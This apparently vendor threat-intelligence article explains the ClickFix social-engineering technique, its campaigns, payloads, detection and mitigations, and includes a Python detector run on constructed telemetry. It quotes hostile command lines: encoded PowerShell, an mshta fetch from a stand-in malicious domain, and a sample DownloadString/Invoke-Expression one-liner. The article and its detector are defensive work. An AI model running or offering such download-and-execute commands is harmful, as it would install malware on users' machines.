ClickFix: The Social Engineering Technique That Tricks Victims Into Infecting Themselves

ClickFix grew 517% in six months and is now the second-largest attack vector in the world. Uniquely, there's no exploit — victims execute the malware themselves. This article covers how it works, real campaigns (DaVita, APT28, Kimsuky), and how your organization can defend against it.

Tim Riset CloudSphere

Threat Intelligence & Security Research

July 1, 2026
15 min read

What Is ClickFix?

ClickFix is a social engineering technique that manipulates victims into voluntarily executing malicious commands on their own devices. No exploit, no suspicious attachment — just a web page with seemingly official instructions and a victim who presses Enter.

This is not a technical vulnerability. It is an attack on human psychology — far more difficult for conventional security technology to block, because the user themselves becomes the 'last-mile executor' of the attack.

World's #2 Attack Vector (H1 2025)

ClickFix accounts for ~8% of all attacks blocked globally, making it the second-largest attack vector worldwide after conventional phishing. Growth in H1 2025 vs H2 2024: +517% (ESET Threat Report H1 2025).

How ClickFix Works — Step-by-Step

ClickFix succeeds because its presentation is convincing and its instructions feel routine. Here is the complete anatomy of this attack from initial contact to infection.

Step 01: Initial Lure — Directing the Victim to a Malicious Page

Victims are directed to a malicious web page through various delivery channels:

  • Phishing emails containing links that appear legitimate
  • Malvertising — malicious ads on streaming or illegal download sites
  • SEO poisoning — malicious sites ranking high in search results
  • Compromised WordPress sites
  • Fake GitHub issue notifications
  • Forums or social media promoting cracked software

Step 02: Fake Verification Page — The Convincing Deception

The page displays a lure that appears highly convincing, including:

  • Fake reCAPTCHA/CAPTCHA: 'Click I'm not a robot to continue'
  • Fake Cloudflare Turnstile: 'Bot protection verification required'
  • Browser error: 'Your browser cannot display this content'
  • Fake Google Meet/Teams/Zoom: 'Your microphone has an issue, run the repair tool'
  • Fake Windows BSOD: a full blue screen display with 'repair' instructions

Step 03: Clipboard Hijacking — Silent Malicious Injection

When the victim clicks a button ('I'm not a robot', 'Fix It', 'Verify'), JavaScript embedded in the page automatically copies a malicious command to the victim's clipboard — without their knowledge. The malicious code is placed at the beginning of the string while non-executable 'comments' are appended at the end to obscure the clipboard contents.

Step 04: User Execution via Win+R — The Victim Runs the Command Themselves

A pop-up appears with seemingly official instructions: 'Press Windows+R, then press Ctrl+V, then press Enter to complete verification.' The victim follows these instructions without realizing they have just executed a malicious command in their Windows terminal. On macOS, victims are directed to open Terminal and paste a bash/curl command.

Step 05: Payload Download — Fetching the Malware

The executed command typically takes the form of an encoded PowerShell command or MSHTA that downloads a payload from the attacker's server. Real-world examples from Group-IB analysis:

  • powershell.exe -eC [BASE64_ENCODED_COMMAND]
  • powershell.exe -WindowStyle Hidden -EncodedCommand [...]
  • mshta.exe 'https://malicious-domain.com/payload'

Step 06: Multi-Stage Delivery — Fileless, Layered Infection

The loader fetches a second stage from a rotating domain. The second stage establishes persistence (registry, scheduled task), attempts to disable protections, and injects the final payload into legitimate Windows processes (such as explorer.exe). The final payload — typically an infostealer or RAT — runs entirely in memory without writing files to disk, evading many traditional antivirus solutions.

History & Evolution of ClickFix

ClickFix did not emerge overnight. It evolved gradually from a simple trick into the preferred tool of nation-state espionage groups.

Period | Key Event
October 2023 | First detection — a simple variant impersonating Cloudflare anti-bot. Not yet named 'ClickFix'
March 2024 | Proofpoint documents it extensively. TA571 and ClearFake cluster become early adopters. The name 'ClickFix' enters use
May 2024 | ClearFake integrates ClickFix + EtherHiding (payload hidden in BNB Chain smart contracts). Payload: Emmenhtal Loader and Lumma Stealer
August 2024 | Mass adoption. SmartApeSG distributes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT via ClickFix
October 2024 | APT28 (Russia) begins using ClickFix — the first time this criminal technique is adopted by a nation-state actor
November 2024 | MuddyWater (Iran) attacks 39+ Middle Eastern organizations with ClickFix
December 2024 | UNK_RemoteRogue (Russia) targets defense weapons manufacturers
Jan–Feb 2025 | Kimsuky (North Korea) begins using ClickFix to target DPRK policy think tanks
H1 2025 | ESET reports +517% surge. ClickFix becomes the world's second-largest attack vector
June 2025 | Researcher mr.d0x introduces FileFix — a ClickFix evolution using the Windows File Explorer address bar. 14 days later it appears in live attacks
Q1 2026 | Seven active variants identified: ClickFix original, TerminalFix, DownloadFix, FileFix, ClickFake Interview, CrashFix, and the macOS Matryoshka variant

Who Is Using ClickFix?

What makes ClickFix especially alarming is not just its prevalence, but who is using it. Within a 90-day window between October 2024 and January 2025, five nation-state groups from four different countries adopted this technique — an unprecedented rate of criminal-to-state-actor technology transfer.

Criminal Actors

  • TA571 — Initial Access Broker, first ClickFix adopter
  • ClearFake — Fake browser update + EtherHiding
  • SmartApeSG (ZPHP) — Multi-payload delivery chain
  • Storm-1865 — Global Booking.com campaign
  • Storm-1607 — Tens of thousands of emails to US & Canada
  • Interlock Group — Ransomware targeting healthcare sector

Nation-State / APT

  • APT28 (Russia) — Espionage via fake Google Spreadsheet
  • UNK_RemoteRogue (Russia) — Targeting defense weapons manufacturers
  • MuddyWater (Iran) — 39+ organizations in the Middle East
  • Kimsuky (North Korea) — DPRK policy think tanks
  • APT36 / Transparent Tribe (Pakistan) — Confirmed May 2025

Malware Delivered via ClickFix

ClickFix is payload-agnostic — it is simply a delivery mechanism. Once the victim executes the command, virtually any type of malware can be deployed. This is what makes it so dangerous: a single social engineering technique can result in data theft, ransomware, or espionage operations.

Lumma Stealer (Infostealer)

The most common payload — responsible for 51% of ClickFix infections. Steals browser credentials, crypto wallets, session cookies, and 2FA codes.

NetSupport RAT (RAT)

A Remote Access Trojan that leverages the legitimate NetSupport Manager tool to conceal its activity from security detection.

Interlock Ransomware (Ransomware)

The Interlock group uses ClickFix as initial access before deploying ransomware in the healthcare sector — DaVita and Kettering Health are confirmed victims.

QuasarRAT (Espionage)

An open-source RAT used by Kimsuky (North Korea) for espionage operations against DPRK policy think tanks in the US and Japan.

DarkGate & Latrodectus (Loader)

Multi-function modular loaders that can download additional payloads, establish persistence, and operate as long-term backdoors.

AMOS (Atomic macOS Stealer) (macOS)

A macOS-specific variant that steals browser credentials, crypto wallets, and other sensitive data — ClickFix is not exclusively a Windows threat.

Documented Real-World Incidents & Campaigns

ClickFix is not merely a theoretical technique. The following are well-documented campaigns and incidents that demonstrate the real-world impact of these attacks across industries and geographies.

DaVita Ransomware — March 2025 (Healthcare)

The second-largest kidney dialysis provider in the US. Initial intrusion via ClickFix on March 24, 2025, detected April 12. Interlock ransomware claimed 1.5 TB of stolen data — 2.7 million patient records exposed.

Kettering Health — May 2025 (Healthcare)

14 hospitals and 120+ clinics across the US Midwest. An Interlock ransomware attack via ClickFix caused thousands of medical procedures to be cancelled. Patient data, medical records, bank statements, and passport scans were stolen.

Storm-1865 Booking.com — Dec 2024 (Hospitality)

Fake emails from 'Booking.com' to hotel staff regarding 'negative guest reviews'. Targets: South Asia, Southeast Asia, North America, Oceania, Europe. Payloads: XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot.

APT28 Espionage — October 2024 (Nation-State)

Russia (APT28) impersonated Google Spreadsheet with a fake reCAPTCHA. When victims 'verified', they unknowingly opened an SSH tunnel to a Metasploit server — used for espionage operations.

MuddyWater / Iran — November 2024 (Nation-State)

Deliberately launched to coincide with Microsoft Patch Tuesday to make 'security alert' emails appear credible. Attacked 39+ financial and government organizations in the Middle East using Level RMM tools for espionage.

Kimsuky / North Korea — Jan 2025 (Espionage)

Impersonated Japanese diplomatic correspondence to deceive DPRK policy think tank researchers in the US, Japan, and South Korea. Victims saw a decoy PDF while QuasarRAT was silently installed in the background.

Statistics & Prevalence 2025

The following quantitative data illustrates the massive scale of ClickFix adoption in a short period — from a niche technique to a global threat faced by nearly every organization.

  • +517%: attack growth in H1 2025 vs H2 2024 (source: ESET Threat Report)
  • #2: largest attack vector globally after conventional phishing (source: ESET H1 2025)
  • ~8%: of all attacks blocked globally in H1 2025 (source: ESET)
  • 47%: of Microsoft Defender Experts initial access notifications involved ClickFix (source: Microsoft)
  • 5 APT groups: nation-state groups from 4 different countries within 90 days (source: Proofpoint)
  • 51%: of ClickFix infections delivered Lumma Stealer as the primary payload (source: industry analysis)

Why Do Users Fall Victim?

ClickFix succeeds not because of technology failure, but because it exploits how the human brain works. Understanding these psychological factors is the first step in building effective security awareness.

Verification Fatigue

Years of CAPTCHAs and security prompts have conditioned users to complete them automatically without scrutiny. They are perceived as 'routine obstacles', not danger signals.

Authority Mimicry

ClickFix pages impersonate trusted services with pixel-perfect accuracy: Google reCAPTCHA, Cloudflare, Booking.com, Microsoft Office. Trust in these brands transfers to the fraudulent page.

Problem-Solution Framing

ClickFix always presents a 'problem' (browser error, video won't load) along with a 'solution' that appears easy and logical. The human brain instinctively seeks to resolve problems.

Urgency Creation

Countdown timers, fake counters ('127 users have already verified'), and warnings that 'your account will be suspended' create psychological pressure that reduces critical thinking capacity.

Exploiting Security Awareness

Users who are already 'phishing-aware' are vigilant about attachments. ClickFix uses no attachments — it is a normal web page with technical instructions. Conventional cognitive defenses do not apply.

Illusion of Control

Victims feel they are 'in control' because they are the ones choosing to press the button. In reality, they are being manipulated. This is psychologically far more effective than a drive-by download.

How to Detect ClickFix Attacks

ClickFix is designed to evade traditional detection because no malicious file is downloaded initially — only a user executing a command. However, there are several artifacts and signals that can be detected.

Detection Method | What to Look For | Tool/Platform
Registry Audit | RunMRU key containing PowerShell, mshta, certutil, Base64 strings, or -WindowStyle Hidden | Windows Registry / SIEM
Windows Event ID 4688 | powershell.exe or mshta.exe spawned by explorer.exe (not an IDE or terminal) | Windows Event Log / SIEM
PowerShell Script Block (Event 4104) | EncodedCommand, DownloadString, Invoke-Expression, or download URLs within scripts | PowerShell Logging / SIEM
EDR Behavioral Detection | Process chain: explorer.exe → powershell.exe → mshta.exe / certutil.exe / bitsadmin.exe | EDR / XDR Platform
Network Detection | Outbound connections to new domains (<30 days old), PowerShell with unusual user-agent, DNS queries to unknown domains | Firewall / IDS / DNS Filter
Threat Intel Integration | IoCs from Recorded Future Risk Lists, VirusTotal, ANY.RUN for active ClickFix-related domains and hashes | SIEM / Threat Intel Feed
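The following Python script is an added example, not code from the original article or from CloudSphere. It runs the Registry Audit, Event 4688 and Event 4104 checks from the table above over constructed sample telemetry: three process-creation records (two spawned from explorer.exe, one benign spawn from an IDE) and a set of RunMRU values. It also decodes the -EncodedCommand argument seen in the Step 05 examples (base64 over UTF-16LE) so the script-content indicators can be matched on the decoded text. Every sample value, including the lure.example.invalid domain and the encoded command, is constructed for this example and is not an indicator from any real campaign.

```python
import base64
import binascii
import re

# Child images the detection table flags when their parent is explorer.exe.
LOLBIN_CHILDREN = ("powershell.exe", "pwsh.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe")

# Script-content indicators taken from the Event 4104 row of the table.
SCRIPT_INDICATORS = ("DownloadString", "DownloadFile", "Invoke-Expression",
                     "Invoke-WebRequest", "http://", "https://")

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the script behind -EncodedCommand (base64 over UTF-16LE), or None."""
    match = ENC_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def inspect_script(text):
    """List the Event 4104 indicators present in a script or command line."""
    lowered = text.lower()
    hits = [kw for kw in SCRIPT_INDICATORS if kw.lower() in lowered]
    if re.search(r"\biex\b", lowered):  # the Invoke-Expression alias
        hits.append("IEX")
    return hits


def inspect_process_event(event):
    """Apply the Event 4688 / EDR chain rows: parent-child pair plus command-line content."""
    findings = []
    parent = event["ParentProcessName"].rsplit("\\", 1)[-1].lower()
    child = event["NewProcessName"].rsplit("\\", 1)[-1].lower()
    if parent == "explorer.exe" and child in LOLBIN_CHILDREN:
        findings.append(f"explorer.exe spawned {child} (Run dialog style launch)")
    cmd = event.get("CommandLine", "")
    if HIDDEN_FLAG.search(cmd):
        findings.append("hidden window requested")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded command decoded")
        findings.extend("decoded " + hit for hit in inspect_script(decoded))
    else:
        findings.extend(inspect_script(cmd))
    return findings


def inspect_runmru(values):
    """Apply the Registry Audit row to HKCU RunMRU values (each value ends in '\\1')."""
    suspicious = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        entry = raw[:-2] if raw.endswith("\\1") else raw
        reasons = [kw for kw in ("powershell", "pwsh", "mshta", "certutil", "bitsadmin")
                   if kw in entry.lower()]
        if HIDDEN_FLAG.search(entry):
            reasons.append("hidden window")
        if decode_encoded_command(entry) is not None:
            reasons.append("base64 encoded command")
        if reasons:
            suspicious.append((name, entry, reasons))
    return suspicious


def _encode(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (for the sample only)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; lure.example.invalid is a placeholder, not a real IoC.
SAMPLE_SCRIPT = "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://lure.example.invalid/verify')"
SAMPLE_ENCODED = _encode(SAMPLE_SCRIPT)
SAMPLE_EVENTS = [
    {"ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -WindowStyle Hidden -EncodedCommand {SAMPLE_ENCODED}"},
    {"ParentProcessName": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\build.ps1"},
    {"ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://lure.example.invalid/verify.hta"},
]
SAMPLE_RUNMRU = {"a": "notepad\\1", "b": f"powershell -w hidden -ec {SAMPLE_ENCODED}\\1",
                 "c": "\\\\fileserver\\share\\1", "MRUList": "bca"}

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["NewProcessName"].rsplit("\\", 1)[-1], inspect_process_event(event))
    print(inspect_runmru(SAMPLE_RUNMRU))
```

The benign IDE-spawned record produces no findings even though it uses -ExecutionPolicy Bypass, which is why the parent process matters more than the flags alone. The decoder is worth keeping in a triage pipeline: the -EncodedCommand path carries the script inside the command line rather than in a file, so process-creation and script-block logging, not script file controls, are what expose its content.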

ClickFix Prevention & Mitigation

No single control is sufficient to stop ClickFix. A combination of technical hardening, personnel training, and layered detection capabilities is required.

  • Security Awareness Training

    Train users to NEVER execute commands from web page instructions. Show real examples of ClickFix pages. Communicate clearly: 'No legitimate CAPTCHA will ever ask you to open the Run dialog or a Terminal.'

  • Disable Windows Run Dialog via GPO

    User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu. This eliminates the primary execution vector for ClickFix.

  • PowerShell Hardening

    Apply Constrained Language Mode, enable Script Block Logging and Transcription Logging, and set Execution Policy to AllSigned or Restricted for non-administrator users.

  • Block mshta.exe for Standard Users

    MSHTA is a Living Off the Land Binary (LOLBIN) favored by ClickFix. Deploy AppLocker or WDAC to prevent its execution by non-administrator users.

  • Deploy EDR with Behavioral Protection

    Ensure your EDR can detect suspicious process chains and is updated with the latest ClickFix signatures. Behavioral detection is far more effective than signature-based approaches for this threat.

  • DNS Filtering & Web Proxy

    Block known malicious domains, newly registered domains (<30 days), and uncategorized sites. A Malicious Domain Blocking and Reporting (MDBR) service provides an additional layer of protection.

  • Email Security with URL Sandboxing

    Filter emails containing links to new domains, sandbox URLs before users can click them, and enforce SPF/DKIM/DMARC to prevent domain spoofing.

  • Application Allowlisting

    Allowlist approved applications and block unknown executables from %APPDATA%, %TEMP%, and other directories commonly used by ClickFix loaders.

Southeast Asia & Indonesia Threat Landscape

While no fully documented ClickFix campaign has exclusively targeted Indonesia, several major campaigns have explicitly named Southeast Asia as a target region — and Indonesia's risk factors are highly significant.

The Storm-1865 campaign impersonating Booking.com (December 2024 – March 2025) explicitly targeted 'South and Southeast Asia' alongside North America, Oceania, and Europe. Given the scale of Indonesia's hospitality and tourism industry, the potential impact is very real.

Indonesia's Risk Factors to Watch

210+ million internet users, a massive and increasingly digital SME sector, a large hospitality industry that was an explicit Storm-1865 target, security awareness that still needs improvement, and widespread use of global services (Google, Microsoft) that are ideal ClickFix impersonation targets. During Ramadan/Eid, phishing — including ClickFix-based techniques — increases by 30% according to LKDI data.

  • Cyber attacks in Southeast Asia doubled in 2024 vs 2023 (source: Positive Technologies)
  • 57,000+: ransomware incidents in Asia Pacific in H1 2024 (source: industry report)
  • Top 6: Indonesia ranks among the most ransomware-impacted countries in Southeast Asia (source: regional analysis)

ClickFix requires no exploit — only psychological manipulation. CloudSphere helps your organization test its resilience against social engineering attacks through Security Assessment & VAPT.
